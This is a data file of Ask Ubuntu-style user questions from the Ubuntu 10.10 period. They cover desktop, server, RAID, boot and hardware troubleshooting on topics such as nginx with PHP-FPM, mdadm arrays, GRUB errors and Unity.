9341	can someone recommend an exif editor ?	anyone knows a good exif editor for ubuntu ? i need some simple functions like importing and exporting exif infos from a picture , copying exif info from one picture to another . i 'd prefer a gtk+ application , better if stand alone and not a function integrated in photo manager .
9343	evolution calendar misbehaving ( vertical space issue )	i have installed ubuntu 10.10 desktop on my 10 ' netbook ( really dislike netbook remixes ) . vertical space is a recurring issue , usually solved by maximising/fullscreening a window or , by setting visual effects to normal with the workspace switcher having an extra row ( window across two workspaces ) . neither of these workarounds work for the calendar screen of evolution . all the other screens act the way they are supposed to ( mail , contacts , preferences , etc ) . whenever i try clicking anywhere on the calendar , including the min/max/close the entire window jumps up or down , making it impossible to select anything , forcing me to restart evolution just to get back to my inbox . i suspect the problem is in the dayview area . so ... how do i fix this ?
9346	how do software updates work ?	i would like to know how software updates work for my ubuntu server 10.10 . i have been recommended to use apt-get install for installing new software and apt-get update for updating software for a ubuntu server in production use . because these packages are tested for ubuntu in contrast to download source code and compile the software on the box . but on my ubuntu server 10.10 , i do n't get the latest stable version of postgresql ( 9 ) or the latest stable version of nginx ( 8 ) using apt-get install . so how is this working , will these software be updated when i later run apt-get update or do i have to later run apt-get install again , or do i have to wait for the next release of ubuntu to get them ? and are patches and security updates managed in the same way ? or can they be updated automatically ? if there is such a setting , how do i check what my system is using ?
9349	no shut down button in my panel	i have following bug in my panel which occurs randomly , but not always , and sometimes bother me . sometimes the shut down button just disappears in the panel , like it is in the picture below . any suggestion would be considered valuable .
9355	windows 7 style live previews	is it possible to get windows 7 style live previews of what a window is doing , when it is hovered over ? for instance , when i hover over a video player on windows 7 , i can see the video playing in the preview . something that works on the gnome panel would be good , but even better would be a docky or awn implementation ? thanks for any help .
9357	how to set up php with nginx , apc and postgresql ?	i use ubuntu server 10.10 and i would like to set up a web server environment with nginx , php 5.3.3 , postgresql and preferably apc and php suhosin . i have already set up postgresql with apt-get install postgresql and nginx with apt-get install nginx . but how do i set up php for these ? can i do this using apt-get install or do i have to download the sources and compile it ? i would prefer to do it using apt-get . i would likte to use php-fpm for nginx . most of the tutorials i have found on internet are old and compile the php , but this is not recommended for production servers . how do i easiest set up php with nginx , apc and postgresql ? or at least php-fpm + nginx ? update i have now installed a fresh ubuntu server 10.10 and executed the command peter suggested with php5-suhosin added . after that nginx works fine , then i edit the generated confiugration file to be as below . after reloading the new config file , nginx still works fine using a index.html file , but when i add a index.php file it stop to work . i guess that this has to do with php-fpm , the apc or something php-related . but it could be the configuration file for php-fpm as well . here is the configuration file for nginx that i 'm using , most of it is generated by default . i have skipped comments . server { listen 80 ; listen [ : : ] :80 default ipv6only=on ; server_name localhost ; access_log /var/log/nginx/localhost.access.log ; location /favicon.ico { empty_gif ; } location / { root /var/www ; index index.php index.html index.htm ; } location ~ \.php $ { fastcgi_pass 127.0.0.1:9000 fastcgi_index index.php ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; include /etc/nginx/fastcgi_params ; } }
9364	how to install dockbarx ?	i just need a link to install dockbarx that 's all please could someone help me .
9368	how can i see what ports are open on my machine ?	i would like to see what ports are open on my machine , e.g . what ports my machine is listening on . e.g . port 80 if i have installed a web server , and so on . is there any command for this ?
9371	ubuntu tweak has no reset option	i do n't have a reset option on ubuntu . i have see the small buttons on the end but nothing is their on my one . is this because this is a old version ?
9372	how can i run windows applications in ubuntu ?	how do i run windows ' applications in ubuntu ?
9375	new mac-address , now i have no network-access	i run ubuntu server 10.10 in virtualbox with windows as host . accidently i choosed to generate a new random mac-address for my ubuntu machine in virtualbox . and now when i have booted my ubuntu with the new mac-address , i do n't get an external ip-address . i 'm using dhcp to get ip-addresses . i guess i have to run a command and inform my ubuntu system that the mac-address has changed to get an external ip-address . if i execute sudo /etc/init.d/networking restart i get this message : siocsifaddr : no such device eth0 : error while getting interface flags : no such device eth0 : error while getting interface flags : no such device bind socket to interface : no such device failed to bring up eth0 how can i solve this ?
9382	how can i configure a service to run at startup	i have a daemon that runs fin if i start it manually with the service command : ricardo @ ricardo-laptop : ~ $ sudo service minidlna start * starting minidlna minidlna [ ok ] but it 's not configured to auto start when the pc reboots . how can i configure it to start automatically , even if no one is logged into the pc ?
9396	virtual serial port for testing purpose	i am writing an application that communicate via a serial port to an external board . in this phase i need to test the serial protocol , but the external hardware is not yet usable . is there a way to open a terminal over a ( virtual ) serial port to my app ?
9398	unity interface on the desktop in 11.04	the web site omg ubuntu http : //www.omgubuntu.co.uk/2010/10/ubuntu-11-04-to-ship-unity-as-default-desktop/ as omg ubuntu has confirmed that the unity interface is coming to desktop in version 11.04 because of these recent developments i have decided to change to unity ( try to buffer the shock for when i am upgrading ) i believe by entering this into terminal my computer will change to unity'apt-get install ubuntu-netbook ' would this be correct ? also if anybody has any proof that omg ubuntu has their fact wrong please comment.thank you .
9401	`` on battery '' is not recognized	i have just bought a lovely thinkpad edge 11 which have ~6 hours of surfing in windows 7 . but unfortunately , a clean ubuntu 10.10 give me max 4 hours which is not satisfactorily . therefore i have installed laptop-mode-tools and powertop . in the sequence of installing and using these tools something have gone wrong . now , the laptop do n't recognize when the power is plugged off so the screen etc . is not dimmed . it still makes a sound when power is plugged in and taken out but i suspect that this is not through ubuntu . i have tried uninstall of the tools and , of cause , rebooting - but nothing helps . i 'm not a pro with linux so some expertise would be appreciated . any ideas to how i can restore the settings or get it to recognize `` on battery '' ? update : i have tried reinstalling acpi-support , pm-utils and laptop-detect without luck .
9402	what file permissions should i set on web root ?	i use ubuntu server 10.10 and have installed nginx web server with apt-get install nginx . it creates a default web page at /var/www/nginx-default/ and that directory has the permissions drwxr-xr-x 2 root root . when i access the default site on http : //localhost/ i get this message on the page 403 forbidden . how should i set the file permissions on the www root so i can secure access the web pages ? or is there something else that i have to change ?
9405	what uml ( unified modelling language ) tools are available ?	i just ca n't find a decent ( and free ) one . what can i use ?
9408	how can i find an always updated list of repository mirrors ?	how can i find an always updated list of repository mirrors ?
9414	seam carving tool	is there a picture compression tool for ubuntu which can be as good as the sea monster for ms windows ?
9417	where to find the md5sums of ubuntu iso images ?	i just downloaded the ubuntu-10.10-desktop-i386.iso , and am having a hard time burning it , so i 'd like to check that the file is intact , but i can not find the md5sum of the file . is there a url or official ftp mirror which includes the md5sum of the ubuntu disk images ?
9423	rss reader with desktop alerts	what is a good rss reader for ubuntu that features a desktop alert mechanism where the alerts include details of each update ? i.e . i want to use it to be notified of new stack overflow questions with a certain tag , so would want to see details of the questions , not just be alerted by a flashing light , etc .
9424	why is ubuntu switching to unity ?	i understand from jono bacon 's blog that ubuntu will be switching to unity as the default desktop in the upcoming 11.04 . what 's not clear is `` why ? '' . could someone explain the benefits of unity over gnome 2.x or indeed gnome 3.x so that people can be informed about this decision ?
9428	how can i make caff work with msmtp ?	i 've a working msmtp configuration and i would like caff ( from signing-party package ) to use msmtp to send the keys i sign after a ksp . so far i 'm only getting this error message : no real mta found , using ‘testfile’ at /usr/share/perl5/mail/mailer.pm line 108 . have somebody use caff with msmtp ? ? ?
9429	minimal bash-like line editing boot error	i 've tried a few links already and many of them have me do numerous commands and every command seems to return `` unknown command '' this is freaking me out since i need to get files off of here and i did nothing ( makes me worried to run ubuntu now after just switching from mac ) . i literally just turned of the laptop after watching a youtube video and working in komodo and running chrome , and when i booted up i get this when trying to boot into ubuntu . the grub version is 1.98+20100804-5ubuntu3 and i ( was ) running ubuntu 10.10 . please tell me this is an easy fix ? like i said , i tried a few links already from older posts like : http : //members.iinet.net.au/~herman546/p15.html # cli and every command gets unknown command . here is a pic from someone elses computer . this is exactly the screen i get except the grub version is different . also , the screen before this has 2 lines and it looks like 2 hdd names , but i ca n't really make out what it says . it looks like it says `` no wubilder '' or something , but it flashes for like 1/4 of a second .
9432	will unity be the only interface for 11.04 ?	will the unity interface be only be default for the 11.04 or until gnome shell is released ? or alternatively will unity continue to be developed after gnome shell is ready . simply : will 11.04 be a one-off release in having the unity interface as default .
9434	help on netbook launcher	can i install the netbook launcher together with existing desktop mode and unity mode ?
9443	how to calibrate the monitor on an ubuntu system ?	what is the procedure to calibrate the monitor and what software to use ? edit : i think what i mean is `` colour profile '' if that 's what it is called . i happened to notice that the same photos look very differently indeed on my home laptop and on other computersâś
9450	is it possible to create a 'shortcut link ' instead of 'symbolic link ' to a folder ?	i have dragged a folder from a nautilus window to the desktop , holding ctrl+shift to create a shortcut ( well , a symbolic link ) . however , when i open it from the desktop , instead of showing /home/scott/documents/asd/folder it shows /home/scott/desktop/folder . but sometimes i want to go up a level or two , and can only go to desktop , not asd . i understand that 's how symbolic links work , but is there a way to create a shortcut to the target folder directly ?
9454	mac mini 4,1 only shows 1 cpu	i 'm running ubuntu 10.10 desktop x86_64 on a mac mini 4.1 and it looks like i can only use one cpu core . it looks like the kernel supports smp . i wish i could tell you whether it worked with lucid , but i did n't notice . anybody know why this is n't working ? here 's some relevant output : $ sudo dmidecode -s system-product-name macmini4,1 $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=10.10 distrib_codename=maverick distrib_description= '' ubuntu 10.10 '' $ uname -a linux harold 2.6.35-22-generic # 35-ubuntu smp sat oct 16 20:45:36 utc 2010 x86_64 gnu/linux edit : i should have included /proc/cpuinfo . this is what i used to confirm that i was only getting use out of one core . i 've since performed a fresh install of x86 maverick on the mac mini ( which was an exercise in frustration in itself ) and now i have use of both cores . i never figured out why it did n't work in the first place .
9458	how to install the nvida drivers through text mode ?	due to a major problem with ubuntu and nouveau , my machine will end up with text-mode only . so , my question is . how can i install the nvida driver through text-mode ? what commands do i need ( and can you list them in order , please ? ) assume i 'm working on a wired connection . my apologies , but text mode leaves me a little stumped . i got 10.10 working by upgrading from 9.10 - > 10.04 - > 10.10 . i 'd rather i did n't have to keep doing this , nor spend money i do n't have .
9460	is it possible to get dragging working on a macbook multi-touch touch pad ?	i have a macbook 5,1 . that is to say that it is the only 13 inch aluminium macbook as the later revisions were renamed macbook pro . two-finger scrolling seems to work fine but dragging does n't work . in osx this works so that you point an object , click and keep your finger pressed on the touch pad while slide another finger to move the cursor . this causes weird and undefined behavior in ubuntu as it seems the driver does n't recognize this as dragging . any ideas ?
9463	what is the apt equivalent to `` rpm -v '' ( verify installed packages )	on a redhat/centos system , i can verify the installed rpms on my system using rpm -v. what is the ubuntu or apt equivalent of this command ?
9467	is it normal that mdadm has to start from scratch when i restart my computer while it 's rebuilding the third disk ?	i 've installed a raid5 using mdadm yesterday . since then it has been rebuilding . i just restarted my computer and it started rebuilding the raid from scratch . ( had 60 % before . ) is this normal or are there any settings missing ? the only thing i did besides creating the raid , was adding this line to /etc/mdadm/mdadm.conf : array /dev/md0 level=raid5 num-devices=3 uuid=bce3de1f : ... :466da02f
9470	how can i make my laptop `` phone home '' if it ever gets stolen ?	if my laptop ever gets stolen , i want it to make an attempt to `` phone home '' so that i can track it down . what can i set up to accomplish this ?
9475	shutdown when ubuntu one has synced	my ubuntu one sometimes takes a while to sync when there 's lots of data added to the folder . rather than run my computer all night , is there a way of getting it to shut down once syncing is finished ?
9477	how to change the unity launcher 's icon theme ?	does anyone know how to change unity icon-theme ? for instance i use faenza in my desktop session , but unity does not use it , both in panel and panel apps ( applications and documents ) . so , anyone ?
9481	does rebuilding a raid change data ?	i 've just restarted my computer which was building up a raid5 for the first time . this of course meant that my computer had to rebuild the whole thing from ground up . before i restarted the computer i 've had already set up a file system , which can not be found anymore . so : does building up the raid ( again ) overwrite any information placed on the volume ?
9486	why wo n't ubuntuone service start automatically at boot ?	if i 'm not mistaken , the ubuntuone sync service is supposed to start automatically during the boot/login process . but i 'm finding that it does n't on either of my 10.10 computers ( one an amd64 desktop and the other an i386 laptop ) . i 'm using the ubuntuone-indicator , but the problem began before i installed it . in my list of startup applications i find one titled `` ubuntu one '' with this command line /bin/sh -c ' [ -d `` $ home/ubuntu one '' ] & & ubuntuone-launch' but the only way for me to start the service is to open the ubuntu one setup ui and click `` connect '' every time i start up the computer . any suggestions as to what might be going wrong ? here is the message output when i run u1sdtool -- status after startup ( i.e. , before starting the ubuntu one service manually ) : oops , an error ocurred : traceback ( most recent call last ) : failure : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntuone-client/ubuntuone-syncdaemon exited with status 1 could the problem be related to the fact that i 'm using connman and the experimental indicator-network package to connect to the internet ?
9487	what 's the difference between load average and cpu load ?	here 's the output of top : top - 23:30:49 up 2:18 , 1 user , load average : 4.36 , 4.36 , 4.39 tasks : 105 total , 2 running , 103 sleeping , 0 stopped , 0 zombie cpu ( s ) : 3.6 % us , 8.0 % sy , 0.0 % ni , 73.4 % id , 9.0 % wa , 1.1 % hi , 4.9 % si , 0.0 % st mem : 2029820k total , 1979312k used , 50508k free , 6828k buffers swap : 5947384k total , 0k used , 5947384k free , 1855304k cached how can the load average be high while the cpu load is low . how is load average calculated ?
9488	make docky timer play a sound ?	is there a way to make the docky timer docklet play an alarm sound , after a timer has run out ? at the moment there only seems to be visual feedback , so you need to watch the screen to know , whether time has run out or not . thanks ysn
9489	which email client works best with gmail imap ?	i use gmail ( and i use labels intensively ) and because of having to use a very slow internet connection now i 've came to the idea that i should try using a desktop email client . what application ( thunderbird , evolution , claws , or some another ) works best with gmail via imap ? first of all i want correct gmail labels support ( for example an email client should n't think of gmail labels as of independent folders , treating messages with multiple labels as multiple different identical messages in different folders ) , incl . special gmail labels-folders like bin , spam , drafts and sent .
9491	what kind of support will unity provide for nvidia cards ?	given that : ubuntu has announced they will be moving to unity on the desktop for 11.04 which requires 3d acceleration . there is no stable 3d acceleration available in open source graphics drivers like nouveau , what will happen when i install ubuntu 11.04 on my machine which has an nvidia card ? will ubuntu ship with open source drivers and run in a mode without the 3d animations ? will ubuntu ship with the proprietary nvidia drivers making it impossible to run a 'free ' desktop . or is there another solution .
9498	sda1 unmountable and ( probably ) corrupt	i also posted this on ubuntu forums and apart from a guy who tried to help nothing came of it . so i though i 'd try posting here ... so , after a restart yesterday , my computer does n't boot correctly ... after grub , it prints mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have /sbin/init . no init found . try passing init=bootarg . busybox v1.10.2 ( ubuntu 1:1.10.2-2ubuntu7 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ and falls to the busybox prompt ... i booted a 10.10 live cd . here is the output of fdisk -l for /dev/sda disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e45d1 device boot start end blocks id system /dev/sda1 1 8924 71681998+ 83 linux /dev/sda2 8925 9179 2048287+ 82 linux swap / solaris /dev/sda3 * 9180 46149 296961525 7 hpfs/ntfs /dev/sda4 46150 60801 117692190 7 hpfs/ntfs sda1 is the root filesystem ( ubuntu 10.04 ) sda2 is the swap sda3 is a win7 ntfs partition sda4 is an ntfs partition with media files . i can normally access sda2-4 . the problem is when i try sudo e2fsck /dev/sda1 with any switch it prints : ubuntu @ ubuntu : ~ $ sudo e2fsck /dev/sda1 e2fsck 1.41.12 ( 17-may-2010 ) e2fsck : device or resource busy while trying to open /dev/sda1 filesystem mounted or opened exclusively by another program ? when i try to mount the disk , the console just hangs . ( it does n't become unresponsive , the cursor just goes to the next line and does n't do anything else ) i tried leaving it for about 15 minutes in case it was checking the disk but nothing happened . i do n't care about restoring the system ( i was gon na reformat anyway ) , all i want is access the data so i can backup .
9499	how do you format a usb stick in ubuntu server	how do you format a usb stick through the terminal ?
9504	how can i use a 2.6.36 kernel in maverick ?	when i was using lucid i noticed they had a backport ppa for kernels but they do n't have one for maverick . i am currently using maverick in generic-pae mode and was wondering what is the easiest way to upgrade the kernel to 2.6.36 with generic-pae ?
9506	vi in mysql for command editing	when using the mysql command line interface , is there any way to get it to let you use vi command editing keys instead of emacs ?
9509	mdadm seems to have completely forgotten about a device and shrunk my array	after a bit of investigating of a problem i 've just encountered , it looks like mdadm has completely forgotten about a new device i 'd added to an array . i recently added a new device to the array which went fine , but i 've now rebooted ( i do n't think i had rebooted since making this change ) and i 've been greeted with all sorts of errors , and i 'm fairly sure it 's down to this . so my question is : should it be safe to just re-add that device back into the array ? i really do n't want to lose any data here ! this is what i think i should do but i 'd like confirmation from someone with a bit more experience first : ) bear in mind i 've already done this once , and have fscked and grown the filesystem too , and have then written plenty more data to it . sudo umount /dev/md0 sudo mdadm -- stop /dev/md0 sudo mdadm -- add /dev/md0 /dev/sdd1 sudo mdadm -- grow /dev/md0 -- raid-devices=4 a bunch of extra information and steps i 've already taken : i rebooted and was greeted with a message along the lines of `` unable to read superblock '' for /dev/md0 , my raid array . i immediately suspected mdadm since i had recently been fiddling with it , and cat /proc/mdstat reports this : ... md0 : inactive sdb1 [ 0 ] ( s ) sdc1 [ 1 ] ( s ) [ /code ] which is wrong ; i had just added /dev/sdd1 to the array too . sudo mount -a reported bad superblock on /dev/md0 . i ca n't remember the next command i used now but something else reported that i had tried to write past the end of the filesystem , which makes sense since there was more data on it than could fit onto the first two devices alone . sudo fdisk -l reports that the new device and partition are alive and well . cat /etc/mdadm/mdadm.conf shows this : device /dev/sdb1 /dev/sdc1 array /dev/md0 level=raid5 num-devices=2 uuid=*snip* spares=1 which shows clearly that it 's completely forgotten about the new device i added . was i supposed to 'save ' the config after executing the commands above ? i assumed they were lasting changes ; i ca n't see any use in them being lost on restarting . edit note : i realised that the 'num-devices=2 ' is inclusive of the 'spares=1 ' , which means that mdadm has n't changed a disk from 'in use ' to 'spare ' , it 's just plain forgotten about it . i 'll update the title to account for that .
9510	ca n't set the resolution ( resolution smaller than expected )	i have an old machine with a max . resolution of 1024x768 and i have a problem setting screen resolution from current ( 640x480 too big icons and words ) to max . i tried the following : installing nvidia driver ( nothing happens ) editing xorg.conf manually twice adding a subsection with a mode `` 1024x768 '' ( nothing happens ) adding a subsection with virtual 1024x1768 from ubuntu help ( only displays a part of the screen ) using xrandr ( nothing happens ) using nvidia -xconfig ( it actually did nothing ) deleting xorg.conf ( this gave me a 800x600 shifted screen a bit to the left ) but then i ran the nvidia-xconfig and the resolution returned the same . here is my xorg ( does n't seem to be generated by nvidia tool ) section `` screen '' identifier `` configured screen device '' defaultdepth 24 endsection section `` device '' identifier `` configured video device '' driver `` nvidia '' endsectionâ
9511	`` the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 ''	$ sudo apt-get update w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com maverick release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/release w : some index files failed to download , they have been ignored , or old ones used instead . how can i remove these warnings ? running apt-get update has given me these warnings from the beginning of my fresh 10.10 install .
9512	problem with me menu and google talk	every time i restart the computer , or resume from standby the memenu goes offline and wo n't let me change my status . the only way to make it work again is to disable google talk and then re enable it . am i missing something in the settings or is this the intended operation . thanks in advance for your help .
9515	how do i change the guest session defaults	i have a quite tunned up gnome desktop and i would like for the guest session to share most of the user settings , this includes : gtk and metacity themes . number of panels , placement and applets . applications that run on login . i 'm having a hard time finding where this configuration files are placed in the filesystem .
9516	eeepc fn buttons do n't work out of the box	some of the fn key combinations do n't work on my eeepc 1005hab . they control important functions such as : volume up , down , and mute sleep launch task manager external monitor toggle wifi on/off track-pad on/off back-light on/off the only buttons that do work are the screen brightness up and down . this would be a great little net-book for ubuntu if only these function keys and track-pad button would work . update : i have tried to install eeepc-acpi-scripts from the software center but it wont install and returns an error : package dependencies can not be resolved . update : after trying to install eeepc-acpi-scripts to no avail i searched lanchpad and found this bug # 262679 . in comment # 35 fioghual writes : i do n't know if i 'm correct , but in my case , after doing some research , it proves unnecessary to install it . what solves everything is : sudo gedit /etc/default/grub replace : grub_cmdline_linux_default= '' quiet splash '' with : grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' and then : sudo update-grub after some testing i found that this solution works perfectly on 10.04 but after an upgrade to 10.10 the process must be repeated again . in 10.10 everything works except the track-pad on/off and the back-light on/off . does anyone know how to fix this ? typing is much more difficult if the track-pad is on .
9518	ubuntu wo n't suspend anymore , but it did upon install	i fresh installed ubuntu 10.10 back when it came out , and my laptop was suspending fine . all of a sudden , i ca n't get my laptop to suspend anymore . it 's an hp pavilion dv2-1110 , but i do n't think it 's a hardware issue , here 's why : it suspended fine upon first install . i have n't installed any new kernels since then , but i have installed tons of packages , so it 's probably a package . the suspend and hibernate options disappeared from the shutdown menu . if i press my keyboard 's suspend button ( or if i close the lid ) i get the following message : if i try the command pmi action suspend , i get the error message : error org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.hal was not provided by any .service files . if i try the command echo -n mem > sudo /sys/power/state i get absolutely no output and no visible effect . what might be causing this behavior ? i thought a list of installed packages might be useful , but it 's huge and i do n't know how to post it here in collapse/expand mode or something . edit : just in case someone asks , none of the installed packages are kdm or anything like that ( which would justify the lack of options in gnome 's shutdown menu ) .
9519	hide icons encrypted file system partitions in nautilus	i 've installed ubuntu 10.04 from the alternate cd . it has an encrypted root and swap partition . the root partition is visible in nautilus as 'file syste ' icon . there is another icon `` 216 gb filesystem '' . if i click it says : unable to mount 216 gb filesystem . /dev/mapper/sda5_crypt is mounted . then there is another icon `` 6.1 gb swap space '' . if i click it it says : unable to mount 6.1 gb swap space . not a mountable file system . how can i hide these last two icons ? partition layout : $ sudo fdisk -l /dev/sda [ sudo ] password for eddyp : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa6e92df4 device boot start end blocks id system /dev/sda1 1 11749 94373811 7 hpfs/ntfs /dev/sda2 11871 38914 217219073 5 extended /dev/sda3 * 11750 11871 976896 83 linux /dev/sda5 11871 38167 211220480 83 linux /dev/sda6 38167 38914 5997568 83 linux partition table entries are not in disk order mounted as : $ mount /dev/mapper/sda5_crypt on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) /dev/sda3 on /boot type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/eddyp/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=eddyp ) /dev/sda1 on /media/s3a6595d003 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions )
9525	latest kernel version number ?	i recently upgraded from lucid lynx to maverick . and then there was a kernel update which i installed . right now when the computer boots up , on the grub boot loader i get 2 options to boot into linux 2.6.35-22-generic or linux 2.6.35-25-generic i am booting into 2.6.35-25 assuming its newer . but , usually newer kernels are placed higher on the grub menu , but this one is below the 2.6.35-22-generic . [ i dont know if that made any sense ] . anyways , which option should i choose ? i usually remove older ones using synaptic and keep the latest copy . thanks .
9532	how to add main menu and other widgets to gnome-do	i am using ubuntu 9.04 , and i instaleld gnome-do , and changed the theme to docky . so far so good . now , i want to get rid of the top panel too , and for that i need to add the menu bar to docky . i tried creating a new menu bar and dragging it , but it doesnt seem to add widgets , only shortcuts . how do i add other widgets , like network-manager , dropbox , etc ? is there a solution ? thanks . edit : a weird side effect is that rhytmbox , yammer , dont minimize in the notification area .
9534	kde , gnome , xfce , unity , ad-nauseum ... can a gui app run in x without any of these ?	this upcoming ubuntu move to unity as its desktop manager , got me wondering where the modular line lies between a desktop manager and x . my understanding is that x is a window manager , and window = gui . is the desktop actually needed at all , to run gui apps ? eg . can x exist without a desktop manager , and can gui apps be launched from the terminal running in x ( which may have to be auto-started with x ) ... i can launch a gui app from the terminal now ( gnome desktop ) , but i do n't know if that is based on a dependancy to the desktop . i may be completely on the wrong track here ... but that 's what questions are for ; )
9540	how do i change the computer name ?	when i connect to my server ( ubuntu server 10.10 ) , i get this : name @ server-name.belkin ~ > how can i remove `` .belkin '' ?
9541	`` mcp power or thermal limit exceeded '' excessive in messages.log	i keep getting `` mcp power or thermal limit exceeded '' every five seconds while my computer is on , regardless of what it 's doing . i googled it and found some intel patches but i do n't really know exactly what they do or how to apply them and i also do n't want to patch my kernel with these random bits of code from some newsgroup . can anyone shed some light on what exactly is going on and what the right fix is in this case ? am i better off just waiting for a kernel patch ?
9542	ubuntu on thinkpad edge 11/13/14/15	i think a community wiki on problems ( and solutions ) when installing ubuntu ( 10.10 ) on a thinkpad edge 11 would be nice ( because i just got one ; ) ) . i 'll contribute with my own problems and solutions , and hope others will join too . thinkwiki entry for the edge 11 known problems : no wifi-driver , solution : answer # 1 , answer # 2 fan is loud , even though it 's on auto . no solution . thinkfan is a possible solution , but correction values for sensors should be supplied ( mapping sensors to specific areas ) . also , one sensor is between -100c and +100c - maybe some kind of deactivation would help . fn keys stop working : see below . no sound on headphones : see below .
9543	shortcut for `` run application '' in unity	what is the keyboard shortcut for run application in unity , or how do i get to the applications screen quickly ? i 've still got the gnome application for setting keyboard shortcuts , and it has alt + f2 set for `` show the run command prompt '' , but that does n't actually do anything .
9553	how do i run a script automatically when i start an app ?	i want to run a script automatically when an application start . how would i do this without making the script run at start-up ? my current approach is writing a script with an infinite loop and made it run at start-up . then let it check if a certain app is running .
9560	how do i configure wakeonusb properly ?	how do i configure wake-on-usb properly on a 10.04 or 10.10 ubuntu ( 2.6.36 and higher if needed ) ? ( wake-on-usb is when the computer is asleep and for example a usb keyboard event wakes up the machine ! ) the notebook is an acer aspire timeline x 1830t . i do n't know in which way the linux kernel supports the controllers . there are different ways to approach this , for example /proc/acpi/wakeup ... or udev ... or something with hal ? /proc/acpi/wakeup shows every device in s4 , but i need s3 . device s-state status sysfs node p0p2 s4 *disabled pegp s4 *disabled p0p1 s0 *disabled pci:0000:00:1e.0 ehc1 s4 *disabled pci:0000:00:1d.0 usb1 s4 *enabled usb2 s4 *disabled usb3 s4 *disabled usb4 s4 *disabled ehc2 s4 *disabled pci:0000:00:1a.0 usb5 s4 *disabled usb6 s4 *disabled usb7 s4 *disabled hdef s0 *disabled pci:0000:00:1b.0 rp01 s5 *disabled pci:0000:00:1c.0 pxsx s5 *disabled pci:0000:01:00.0 rp02 s0 *disabled pci:0000:00:1c.1 pxsx s5 *disabled pci:0000:02:00.0 rp03 s0 *disabled pxsx s5 *disabled rp04 s0 *disabled pxsx s5 *disabled rp05 s0 *disabled pxsx s5 *disabled rp07 s0 *disabled pxsx s5 *disabled rp08 s0 *disabled pxsx s5 *disabled glan s0 *disabled peg3 s4 *disabled peg5 s4 *disabled peg6 s4 *disabled slpb s3 *enabled s4 , which is suspend-to-disk afaik ... does n't seem to work either if i echo usb1 into the wakeup table . it just sets an s4 flag . can i get the usb ports in s3 ? i want to make the machine wakeup from suspend-to-ram ( s3 , acpi standard ) in case a key on my external keyboard is pressed . it only wakes up if a key on the internal laptop keyboard is pressed ... from suspend to ram . it seems if i plug in a usb mouse , that the usb port is n't even powered . i have no bios option to change this . further specific information regarding the device : usb-devices t : bus=01 lev=02 prnt=02 port=01 cnt=01 dev # = 13 spd=1.5 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 p : vendor=04d9 prodid=1603 rev=03.10 s : manufacturer= s : product=usb keyboard c : # ifs= 2 cfg # = 1 atr=a0 mxpwr=100ma i : if # = 0 alt= 0 # eps= 1 cls=03 ( hid ) sub=01 prot=01 driver=usbhid i : if # = 1 alt= 0 # eps= 1 cls=03 ( hid ) sub=00 prot=00 driver=usbhid root @ underwater-laptop : / # lsusb [ ... ] bus 001 device 013 : id 04d9:1603 holtek semiconductor , inc . bus 001 device 004 : id 0bda:0138 realtek semiconductor corp . bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub [ ... ] if this does n't work i have to properly explain why : ( - but i think it is very hard to research this kernel internal . any hints for good information here ? i hope it 's possible ... i 'm just looking for any solution . edit : this , waking up on usb , works on windows ! thanks a lot , marius
9562	uninstalling unity results in booting to white screen	i installed unity from the software center then decided to eventually remove it . now my desktop boots to a while screen . i get the nvidia splash and then a white screen . i can see my mouse pointer and move it around and if i use ctrl + alt plus arrow i can see the workspace switcher , but that 's its . ctrl alt f1 gives me a command prompt . how do i recover my desktop
9568	coloured fringing with windows truetype fonts	i 've noticed that with some fonts show some fringing ( that is coloured usually red/bluey lines ) surrounding the text . here 's one example . a portion of my job is design and i 'm finding it very hard to use native tools when the system ca n't antialias some fonts . it 's also double-ugly for me . anybody else experiencing this ? found a fix ? i 'm using subpixel smoothing , full hinting and the rgb subpixel order .
9571	how can i see folders from terminal ?	how can i list folders from within the terminal , which command should i use ?
